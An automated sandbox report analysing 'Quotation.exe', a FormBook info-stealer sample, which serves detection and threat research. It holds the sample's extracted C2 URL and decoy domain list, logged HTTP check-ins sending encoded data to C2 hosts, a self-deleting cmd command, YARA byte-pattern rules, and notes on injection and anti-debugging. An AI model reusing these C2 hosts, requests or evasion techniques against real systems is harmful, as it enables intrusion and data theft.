Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Quotation.exe

Overview

General Information

Sample Name:Quotation.exe
Analysis ID:383984
MD5:1f86caaa19912ceb55c9f6121eb692bb
SHA1:2d4dd95fdb17937b22a3d6a41862704ed80acf70
SHA256:8309d803c92faaf24828cd67e4c1041f9465ecf6c63f7608d7ed4579f075a02c
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Quotation.exe (PID: 6372 cmdline: 'C:\Users\user\Desktop\Quotation.exe' MD5: 1F86CAAA19912CEB55C9F6121EB692BB)
    • Quotation.exe (PID: 6424 cmdline: 'C:\Users\user\Desktop\Quotation.exe' MD5: 1F86CAAA19912CEB55C9F6121EB692BB)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • netsh.exe (PID: 6916 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 7012 cmdline: /c del 'C:\Users\user\Desktop\Quotation.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.riceandginger.com/fcn/"], "decoy": ["bellee-select.com", "unlock-motorola.com", "courtneyrunyon.com", "hnzywjz.com", "retrievingbest.net", "ayescarrental.com", "beyoutifulblessings.com", "heritagediscovery.net", "fasoum.com", "wbz.xyz", "lownak.com", "alinkarmay.com", "coffeyquiltco.com", "validdreamers.com", "yuksukcu.club", "buildnextfrc.com", "avantfarme.com", "xyfs360.com", "holisticpacific.com", "banejia.com", "champsn.com", "ebitit.com", "esseneceedibles.com", "findmyautoparts.com", "belenusadvisory.net", "esrise.net", "lovewillfindaway.net", "chienluocmarketing.net", "greenbelieve.com", "shopyourgift.com", "theweddingofshadiandmike.com", "greenstavern.com", "klinku.com", "norastravel.com", "team5thgroup.com", "ohrchadash.com", "hauteandcood.com", "ap-333.com", "jonathantyar.com", "robertabraham.com", "citestaccnt1597691130.com", "665asilo.com", "deerokoj.com", "ezcovid19.com", "heritageivhoa.com", "ultraprecisiondata.com", "alkiefsaudi.com", "camelliaflowers.space", "clickqrcoaster.com", "ponorogokita.com", "stainlesslion.com", "china-ymc.com", "littner.xyz", "houseof2.com", "metabolytix.com", "1000-help6.club", "another-sc.com", "suafrisolac.com", "whitetreechainmail.com", "amazon-service-app-account.com", "cruiseameroca.com", "yaxett.net", "adsmat.com", "afternoontravel.site"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.Quotation.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.Quotation.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.Quotation.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.Quotation.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.Quotation.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.riceandginger.com/fcn/"], "decoy": ["bellee-select.com", "unlock-motorola.com", "courtneyrunyon.com", "hnzywjz.com", "retrievingbest.net", "ayescarrental.com", "beyoutifulblessings.com", "heritagediscovery.net", "fasoum.com", "wbz.xyz", "lownak.com", "alinkarmay.com", "coffeyquiltco.com", "validdreamers.com", "yuksukcu.club", "buildnextfrc.com", "avantfarme.com", "xyfs360.com", "holisticpacific.com", "banejia.com", "champsn.com", "ebitit.com", "esseneceedibles.com", "findmyautoparts.com", "belenusadvisory.net", "esrise.net", "lovewillfindaway.net", "chienluocmarketing.net", "greenbelieve.com", "shopyourgift.com", "theweddingofshadiandmike.com", "greenstavern.com", "klinku.com", "norastravel.com", "team5thgroup.com", "ohrchadash.com", "hauteandcood.com", "ap-333.com", "jonathantyar.com", "robertabraham.com", "citestaccnt1597691130.com", "665asilo.com", "deerokoj.com", "ezcovid19.com", "heritageivhoa.com", "ultraprecisiondata.com", "alkiefsaudi.com", "camelliaflowers.space", "clickqrcoaster.com", "ponorogokita.com", "stainlesslion.com", "china-ymc.com", "littner.xyz", "houseof2.com", "metabolytix.com", "1000-help6.club", "another-sc.com", "suafrisolac.com", "whitetreechainmail.com", "amazon-service-app-account.com", "cruiseameroca.com", "yaxett.net", "adsmat.com", "afternoontravel.site"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dllReversingLabs: Detection: 12%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Quotation.exeReversingLabs: Detection: 22%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPE
          Source: 8.2.netsh.exe.2f15d18.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.1.Quotation.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.2.netsh.exe.398f834.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.Quotation.exe.1eb40000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.Quotation.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Quotation.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: netsh.pdb source: Quotation.exe, 00000001.00000002.278705852.0000000000799000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 00000000.00000003.232762609.000000001ED00000.00000004.00000001.sdmp, Quotation.exe, 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, netsh.exe, 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp
          Source: Binary string: netsh.pdbGCTL source: Quotation.exe, 00000001.00000002.278705852.0000000000799000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: Quotation.exe, netsh.exe
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_0040531D
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405CB0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 4x nop then pop esi1_2_004172F0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 4x nop then pop esi1_1_004172F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop esi8_2_02BB72F0

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 162.241.24.122:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 162.241.24.122:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 162.241.24.122:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 198.54.117.216:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 198.54.117.216:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 198.54.117.216:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.riceandginger.com/fcn/
          Source: global trafficHTTP traffic detected: GET /fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=SEmbethRuJUohlQz+Ttvx+iBOmYZkGVPsXZysf/6weMAgxRZQrWYJhCujRXBjoMPQ+uG HTTP/1.1Host: www.xyfs360.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fcn/?ndsxlrp=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&wZALH=PToxs4gHMXctdDo HTTP/1.1Host: www.riceandginger.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=liB0icShPNod4xlpu/WXKffa+vmxvgDQmU6O7prVAXsGW3hWFkE60zcwKq/t6p2og2/V HTTP/1.1Host: www.houseof2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fcn/?ndsxlrp=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&wZALH=PToxs4gHMXctdDo HTTP/1.1Host: www.clickqrcoaster.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.216 198.54.117.216
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: global trafficHTTP traffic detected: GET /fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=SEmbethRuJUohlQz+Ttvx+iBOmYZkGVPsXZysf/6weMAgxRZQrWYJhCujRXBjoMPQ+uG HTTP/1.1Host: www.xyfs360.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fcn/?ndsxlrp=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&wZALH=PToxs4gHMXctdDo HTTP/1.1Host: www.riceandginger.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=liB0icShPNod4xlpu/WXKffa+vmxvgDQmU6O7prVAXsGW3hWFkE60zcwKq/t6p2og2/V HTTP/1.1Host: www.houseof2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fcn/?ndsxlrp=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&wZALH=PToxs4gHMXctdDo HTTP/1.1Host: www.clickqrcoaster.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.xyfs360.com
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: netsh.exe, 00000008.00000002.501631169.0000000003E7F000.00000004.00000001.sdmpString found in binary or memory: http://www.NameBright.com
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: netsh.exe, 00000008.00000002.501631169.0000000003E7F000.00000004.00000001.sdmpString found in binary or memory: http://www.namebrightstatic.com/images/logo_off.gif)
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00404EBC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EBC

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
